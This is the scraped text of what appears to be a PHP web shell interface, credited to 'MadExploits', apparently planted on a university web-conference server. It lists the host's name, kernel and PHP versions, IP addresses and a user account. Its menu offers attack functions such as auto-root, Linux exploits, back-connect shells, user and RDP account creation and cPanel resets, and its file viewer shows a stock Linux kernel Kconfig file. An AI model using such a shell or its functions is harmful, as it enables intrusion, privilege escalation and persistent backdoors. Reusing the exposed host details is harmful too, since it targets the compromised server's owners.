Linux web-conference.aiou.edu.pk 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 172.16.50.247 | : 3.144.242.84
Cant Read [ /etc/named.conf ]
7.4.3-4ubuntu2.28
appadmin
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
src /
linux-headers-5.4.0-186 /
drivers /
virt /
[ HOME SHELL ]
Name
Size
Permission
Action
vboxguest
[ DIR ]
drwxr-xr-x
Kconfig
1
KB
-rw-r--r--
Makefile
168
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Kconfig
# SPDX-License-Identifier: GPL-2.0-only # # Virtualization support drivers # menuconfig VIRT_DRIVERS bool "Virtualization drivers" ---help--- Say Y here to get to see options for device drivers that support virtualization environments. If you say N, all options in this submenu will be skipped and disabled. if VIRT_DRIVERS config FSL_HV_MANAGER tristate "Freescale hypervisor management driver" depends on FSL_SOC select EPAPR_PARAVIRT help The Freescale hypervisor management driver provides several services to drivers and applications related to the Freescale hypervisor: 1) An ioctl interface for querying and managing partitions. 2) A file interface to reading incoming doorbells. 3) An interrupt handler for shutting down the partition upon receiving the shutdown doorbell from a manager partition. 4) A kernel interface for receiving callbacks when a managed partition shuts down. source "drivers/virt/vboxguest/Kconfig" endif
Close